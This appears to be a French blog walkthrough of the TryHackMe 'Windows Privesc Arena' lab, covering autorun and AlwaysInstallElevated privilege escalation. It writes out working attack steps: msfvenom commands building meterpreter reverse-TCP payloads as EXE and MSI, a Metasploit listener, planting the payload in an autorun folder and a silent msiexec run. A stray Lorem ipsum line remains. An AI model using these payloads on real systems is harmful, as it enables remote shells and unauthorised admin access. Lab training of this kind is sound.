Comment bien comprendre la room Windows Privesc Arena de TryHackMe

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.

Task 2 Deploy the vulnerable machine

Deploy the machine and log into the user account via RDP

command redesktop 10.10.242.91


Open a command prompt and run ‘net user’. Who is the other non-default user on the machine?

TCM

Task 3 Registry Escalation - Autorun

Détection :

C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe

Une fois autoruns ouvert, il faut se rendre sur l’onglet Logon, puis dans la liste selectionner My program, et enfin clic/propriété.

 

Détection avec accesscheck

commande sans l’option /accepteula ( il demande d’acceptre les conditions )

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu “C:\Program Files\Autorun Program”

Commande avec /accepteula ( il effectue diretement la commande )

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe /accepteula -wvu “C:\Program Files\Autorun Program”

 

Exploitation

creation du pyalod

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.9.7.79 -f exe -o program.exe

msfconsole

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.9.7.79
run

Copie du pyaload sur le système victime

Pour copie facilement le fichier porgram.exe à la place de l’originale, je vous conseille d’utiliser cette commande qui m’a été très utilise durant le lab OSCP.

rdesktop -r disk:tmp=/root/trytohackme/windows_privesc_arena 10.10.242.91

Ainsi on obteint un dossier partagé dans l’explorateur de windows.

Il n’y a plus qu’a copié le fichier program.exe dans le dossier C:\Program Files\Autorun Program. Attention, il faut le copier, pas supprimer l’originale et mettre le payload à la place. 9a ne fonctionnera pas.

Une fois que l’on se connecte avec le compte admin, on reçoit la nouvelle session.

 

Task 4 Registry Escalation - AlwaysInstallElevated

Detection

Commande :

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

reg query HKCU\Software\Policies\Microsoft\Windows\Installer

Exploitation 

Mise en place d’un écouter avec msfconsole :

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost [Kali VM IP Address]
run

Création diu paypolad ( dans un autre terminal )

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.9.7.79 -f msi -o setup.msi

Copie du fichier msi via le dossier partagé.

 

Exécution du payload :

msiexec /quiet /qn /i C:\users\user\setup.msi

 

Une fois le payload setup.msi exécuté, on reçoit la session sur le meterpreter.

La suite arrive bientôt 😃